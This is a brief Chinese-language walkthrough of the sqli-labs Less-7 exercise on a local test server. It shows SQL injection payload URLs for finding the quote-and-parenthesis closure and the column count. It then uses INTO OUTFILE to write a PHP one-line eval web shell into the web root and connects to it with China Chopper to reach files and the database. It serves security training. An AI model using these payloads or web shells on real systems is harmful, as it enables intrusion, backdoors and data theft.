一、输入id,提示 use outfile
http://127.0.0.1/sqli-labs-master/Less-7/?id=1
二、在数据库的配置文件my.ini添加权限
secure_file_priv= #代表对文件读写没有限制
三、判断闭合方式
1.加单引号,报错
http://127.0.0.1/sqli-labs-master/Less-7/?id=1'
2.加注释符,报错
http://127.0.0.1/sqli-labs-master/Less-7/?id=1'--+
3.加一个括号,报错
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')--+
4.加两个括号,页面正常,则闭合方式为 '))
http://127.0.0.1/sqli-labs-master/Less-7/?id=1'))--+
四、判断字段数,为3个字段,大于3的数都会报错
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 3--+
五、写入一句话木马文件
1.写入文件,提交后页面显示报错
http://127.0.0.1/sqli-labs-master/Less-7/?id=-1')) union select 1,'<?php eval($_POST[chopper]);?>',3 into outfile "D:\\software\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\test.php"--+
2.查看写文件路径下有没有test.php文件
六、打开test.php文件,输出1 3
http://127.0.0.1/sqli-labs-master/Less-7/test.php
七、打开中国菜刀,添加上一步的url,密码输入chopper,也就是一句话木马post里的值
八、添加之后,右键点击文件管理,可看到本地文件系统
九、右键编辑,添加数据库信息
T #数据库类型
H #主机地址
U #数据库用户名
P #数据库密码
十、右键数据库管理,可成功查看数据库
十一、查询username
over~